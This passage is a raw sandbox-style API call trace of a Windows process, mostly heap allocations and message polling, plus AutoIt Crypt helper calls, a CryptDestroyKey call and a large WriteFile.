wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0152.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0152.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0152.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0152.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.928] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0152.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0152.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0152.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0152.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0152.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0152.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0152.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0152.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0152.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.930] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0152.931] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0152.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.931] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0152.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0152.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0152.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0152.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0152.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0152.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0152.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14190) returned 0x2ea8660 [0152.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0152.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14190) returned 0x2ed0990 [0152.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8660 | out: hHeap=0x970000) returned 1 [0152.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0152.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14190) returned 0x2ea8660 [0153.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0990 | out: hHeap=0x970000) returned 1 [0153.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0153.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14190) returned 0x2ed0990 [0153.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8660 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0153.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0153.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0153.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0153.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0153.127] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x14190, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x14190, lpOverlapped=0x0) returned 1 [0153.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0153.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0153.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0153.131] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0153.131] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0153.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.131] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0153.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0153.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0153.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.132] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0153.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.132] CryptDestroyKey (hKey=0xa870d0) returned 1 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0153.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0153.134] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0153.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0153.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.134] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0153.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.134] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0153.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0153.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0153.135] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.135] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0153.135] HeapFree (in: 